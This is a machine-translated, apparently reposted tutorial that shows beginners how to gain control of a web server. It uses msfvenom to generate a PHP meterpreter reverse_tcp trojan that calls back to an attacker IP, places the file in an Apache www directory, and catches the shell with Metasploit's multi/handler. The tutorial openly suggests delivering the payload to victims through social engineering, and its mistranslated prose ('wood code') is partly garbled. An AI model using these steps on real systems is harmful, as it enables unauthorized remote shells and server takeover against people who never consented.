current position:Home>Yyds dry goods inventory network security, website security and computer security: how does Xiaobai use Kali Linux to obtain the operation authority of web website server [i]
Yyds dry goods inventory network security, website security and computer security: how does Xiaobai use Kali Linux to obtain the operation authority of web website server [i]
2022-01-27 00:29:19 【Kali and programming】
One 、 Background introduction
Metasploit Is a network security framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own scripts , To test .Metasploit(msf) How powerful it is ? How to use the wood code to control the victim's host ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Safety drill
3.1 Send the victim to the host (Windows7) With the controller host (Kali Linux) All network modes are set to NAT Pattern , As shown in the figure below .
step : Open the virtual machine settings / Choose a network adapter / choice NAT Pattern .
3.2 Check the of the two hosts in the experiment IP Address , As shown in the figure below .
command :ifconfig
3.3 utilize “msfvenom” The wood code generation tool generates the corresponding wood code file , As shown in the figure below .
step 1:msfvenom Introduction to the parameters of the tool
-p, –payload < payload> Specify the payload load . You can also use custom payload, It supports almost all platforms
-o, –out < path> Specify the created payload Storage location of .
-h, –help See help options .
step 2: utilize msfvenom The tool generates the corresponding wood code file , As shown in the figure below .
command :msfvenom -p Specify the payload load lhost= Controller host IP -f exe > Save location of the generated wood code file
Example :msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php
step 3: Find out whether the corresponding wood code file has been generated under the directory of the known wood code file saving path , As shown in the figure below , The wood code file already exists ( Here, a graphical file management system is used to view , You can also use ls Command to check whether the corresponding wood code file has been generated under the corresponding path ).
3.4 Using certain social engineering methods, the generated wood code file is sent to the target victim host , And run on the victim's host ( For the corresponding social engineering knowledge, please continue to pay attention to this number , Follow up explanation ), As shown in the figure below .
3.5 install “phpstudy Integrated environment ”, As shown in the figure below .
step 1: open “phpstudy” Choose the software version corresponding to your computer system on the official website to download .
step 2: Installation precautions
1. The installation path cannot contain “ chinese ” perhaps “ Space ”, Otherwise, an error will be reported ( For example, error prompts :Can't change dir to 'G:\\x65b0\x5efa\x6587\)
2. Make sure the installation path is clean , You cannot have installed in the installation path V8 edition , If you reinstall , Please choose another path
step 3:phpstudy Official tutorial , Take it by yourself .
website :https://www.php.cn/course/1066.html
3.6 After installing the corresponding software , start-up phpstudy Environment in , As shown in the figure below .
step 1: Click the start button next to the corresponding environment to start .
step 2: Get into apache service , As shown in the figure below .
3.7 Upload the corresponding wood code file to apache Service www Under the table of contents , As shown in the figure below .
3.8 start-up Metasploit(msf) frame , As shown in the figure below .
command 1:msfconsole
command 2:use exploit/multi/handler
command 3:set payload php/meterpreter/reverse_tcp
command 4:show options
command 5:set lhost 192.168.78.168
command 6:run( Boot module )
3.9 Get the of the target host server shell, As shown in the figure below .
command :shell Get into shell page .
copyright notice
author[Kali and programming],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201270029168771.html
The sidebar is recommended
- Spring IOC container loading process
- [thinking] the difference between singleton mode and static method - object-oriented programming
- Hadoop environment setup (MySQL environment configuration)
- 10 minutes, using node JS creates a real-time early warning system for bad weather!
- Git tool
- Force deduction algorithm - 92 Reverse linked list II
- What is the sub problem of dynamic programming?
- C / C + +: static keyword summary
- Idea does not have the artifacts option when configuring Tomcat
- Anaconda can't open it
guess what you like
-
I don't know how to start this
-
Matlab simulation of transportation optimization algorithm based on PSO
-
MySQL slow log optimization
-
[Vue] as the window is stretched (larger, smaller, wider and higher), the text will not be displayed
-
Popular Linux distributions for embedded computing
-
Suzhou computer research
-
After installing SSL Certificate in Windows + tomcat, the domain name request is not successful. Please answer!!
-
Implementation time output and greetings of jQuery instance
-
The 72 year old uncle became popular. Wu Jing and Guo fan made his story into a film, which made countless dreamers blush
-
How to save computer research
Random recommended
- Springboot implements excel import and export, which is easy to use, and poi can be thrown away
- The final examination subjects of a class are mathematical programming, and the scores are sorted and output from high to low
- Two pronged approach, Tsinghua Professor Pro code JDK and hotspot source code notes, one-time learning to understand
- C + + recursive knapsack problem
- The use of GIT and GitHub and the latest git tutorial are easy to understand -- Video notes of crazy God speaking
- PostgreSQL statement query
- Ignition database test
- Context didn't understand why he got a high salary?, Nginxfair principle
- Bootstrap switch switch control user's guide, springcloud actual combat video
- A list that contains only strings. What other search methods can be used except sequential search
- [matlab path planning] multi ant colony algorithm grid map path planning [including GUI source code 650]
- [matlab path planning] improved genetic algorithm grid map path planning [including source code phase 525]
- Iinternet network path management system
- Appium settings app is not running after 5000ms
- Reactnative foundation - 07 (background image, status bar, statusbar)
- Reactnative foundation - 04 (custom rpx)
- If you want an embedded database (H2, hsql or Derby), please put it on the classpath
- When using stm32g070 Hal library, if you want to write to flash, you must perform an erase. If you don't let it, you can't write continuously.
- Linux checks where the software is installed and what files are installed
- SQL statement fuzzy query and time interval filtering
- 69. Sqrt (x) (c + + problem solving version with vs runnable source program)
- Fresh students are about to graduate. Do you choose Java development or big data?
- Java project: OA management system (java + SSM + bootstrap + MySQL + JSP)
- Titanic passenger survival prediction
- Vectorization of deep learning formula
- Configuration and use of private image warehouse of microservice architect docker
- Relearn JavaScript events
- For someone, delete return 1 and return 0
- How does Java dynamically obtain what type of data is passed? It is used to judge whether the data is the same, dynamic data type
- How does the database cow optimize SQL?
- [data structure] chain structure of binary tree (pre order traversal) (middle order traversal) (post order traversal) (sequence traversal)
- Webpack packaging optimization solution
- 5. Operation element
- Detailed explanation of red and black trees
- redhat7. 9 install database 19C
- Blue Bridge Cup notes: (the given elements are not repeated) complete arrangement (arrangement cannot be repeated, arrangement can be repeated)
- Detailed explanation of springboot default package scanning mechanism and @ componentscan specified scanning path
- How to solve the run-time exception of test times
- Detailed explanation of k8s management tool kubectl
- Android system view memory command